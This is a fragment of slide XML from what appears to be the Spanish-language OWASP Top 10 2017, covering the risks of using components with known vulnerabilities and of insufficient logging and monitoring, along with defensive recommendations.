            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y dependencias, con un enfoque basado en riesgos. Esto sucede comúnmente en ambientes en los cuales la aplicación de parches se realiza de forma mensual o trimestral bajo control de cambios, lo que deja a la organización abierta innecesariamente a varios días o meses de exposición a vulnerabilidades ya solucionadas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="3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No asegura la configuración de los componentes correctamente (vea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A6:2017-Configuración de Seguridad Incorrecta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Testing Guide: Map Application Architecture (OTG-INFO-010)</a:t>
            </a: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sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Externos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Ruby Libraries Security Advisory Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>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marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="2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Remover dependencias, funcionalidades, componentes, archivos y documentación innecesaria y no utilizada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="2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Utilizar una herramienta para mantener un inventario de versiones de componentes (por ej. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o bibliotecas) tanto del cliente como del servidor. Por ejemplo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Dependency Check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Monitorizar continuamente fuentes como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> en búsqueda de vulnerabilidades en los componentes utilizados. Utilizar herramientas de análisis automatizados. Suscribirse a alertas de seguridad de los componentes utilizados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="2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Obtener componentes únicamente de orígenes oficiales utilizando canales seguros. Utilizar preferentemente paquetes firmados con el fin de reducir las probabilidades de uso de versiones manipuladas maliciosamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Supervisar bibliotecas y componentes que no poseen mantenimiento o no liberan parches de seguridad para sus versiones obsoletas o sin soporte. Si el parcheo no es posible, considere desplegar un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>parche virtual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> para monitorizar, detectar o protegerse contra la debilidad detectada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cada organización debe asegurar la existencia de un plan para monitorizar, evaluar y aplicar actualizaciones o cambios de configuraciones durante el ciclo de vida de las aplicaciones.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A9</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t>Uso de Componentes con Vulnerabilidades Conocidas</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0"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494277817"/>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Explotabilidad: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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalencia:</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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectabilidad: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Técnico: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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="88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 sencillo obtener </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="880" i="1"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exploits</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="88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para vulnerabilidades ya conocidas pero la explotación de otras requieren un esfuerzo considerable, para su desarrollo y/o personalización.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="88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es-AR" sz="88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Estos defectos están muy difundidos. El desarrollo basado fuertemente en componentes de terceros, puede llevar a que los desarrolladores no entiendan qué componentes se utilizan en la aplicación o API y, mucho menos, mantenerlos actualizados. Esta debilidad es detectable mediante el uso de analizadores tales como </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="880" i="1"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8"/>
                        </a:rPr>
                        <a:t>retire.js </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="88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 la inspección de cabeceras. La verificación de su explotación requiere de la descripción de un posible ataque.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="88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es-AR" sz="88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Mientras que ciertas vulnerabilidades conocidas conllevan impactos menores, algunas de las mayores brechas registradas han sido realizadas explotando vulnerabilidades conocidas en componentes comunes.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="88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Dependiendo del activo que se está protegiendo, este riesgo puede ser incluso el principal de la lista.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="88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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="86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Escenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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el software de un foro de código abierto es operado por un pequeño equipo que fue atacado utilizando una falla de seguridad. Los atacantes lograron eliminar el repositorio del código fuente interno que contenía la próxima versión, y todos los contenidos del foro. Aunque el código fuente pueda ser recuperado, la falta de monitorización, registro y alerta condujo a una brecha de seguridad peor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="86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Escenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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un atacante escanea usuarios utilizando contraseñas por defecto, pudiendo tomar el control de todas las cuentas utilizando esos datos. Para todos los demás usuarios, este proceso deja solo un registro de fallo de inicio de sesión. Luego de algunos días, esto puede repetirse con una contraseña distinta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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860" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="86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Escenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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De acuerdo a reportes, un importante minorista tiene un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="860" i="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sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR"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de análisis de malware interno para los archivos adjuntos de correos electrónicos. Este </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="860" i="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sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR"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había detectado software potencialmente indeseable, pero nadie respondió a esta detección. Se habían estado generando advertencias por algún tiempo antes de que la brecha de seguridad fuera detectada por un banco externo, debido a transacciones fraudulentas de tarjetas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="86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860" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El registro y monitoreo insuficientes ocurren en cualquier momento:</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Eventos auditables, tales como los inicios de sesión, fallos en el inicio de sesión, y transacciones de alto valor no son registrados.</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Advertencias y errores generan registros poco claros, inadecuados o ninguno en absoluto.</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Registros en aplicaciones o APIs no son monitoreados para detectar actividades sospechosas.</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Los registros son almacenados únicamente de forma local.</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Los umbrales de alerta y de escalamiento de respuesta no están implementados o no son eficaces.</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Las pruebas de penetración y escaneos utilizando herramientas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) no generan alertas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La aplicación no logra detectar, escalar o alertar sobre ataques en tiempo real.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>También es vulnerable a la fuga de información si registra y alerta eventos visibles para un usuario o un atacante (consulte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017 - Exposición de datos sensibles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR"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300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Según el riesgo de los datos almacenados o procesados por la aplicación:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Asegúrese de que todos los errores de inicio de sesión, de control de acceso y de validación de entradas de datos del lado del servidor se pueden registrar para identificar cuentas sospechosas. Mantenerlo durante el tiempo suficiente para permitir un eventual análisis forense.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Asegúrese de que las transacciones de alto impacto tengan una pista de auditoría con controles de integridad para prevenir alteraciones o eliminaciones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Asegúrese que todas las transacciones de alto valor poseen una traza de auditoría con controles de integridad que permitan detectar su modificación o borrado, tales como una base de datos con permisos de inserción únicamente u similar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establezca una monitorización y alerta efectivos de tal manera que las actividades sospechosas sean detectadas y respondidas dentro de períodos de tiempo aceptables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establezca o adopte un plan de respuesta o recuperación de incidentes, tales como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>NIST 800-61 rev.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o posterior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Existen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="850" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de protección de aplicaciones comerciales y de código abierto tales como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>OWASP AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="850" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>firewalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de aplicaciones web como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>ModSecurity utilizando el Core Rule Set de OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, y software de correlación de registros con paneles personalizados y alertas.</a:t>
            </a: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A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="2000" noProof="0" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
              <a:t>Registro y Monitoreo Insuficientes</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0"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59838138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Explotabilidad:</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalencia:</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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectabilidad:</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Técnico:</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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
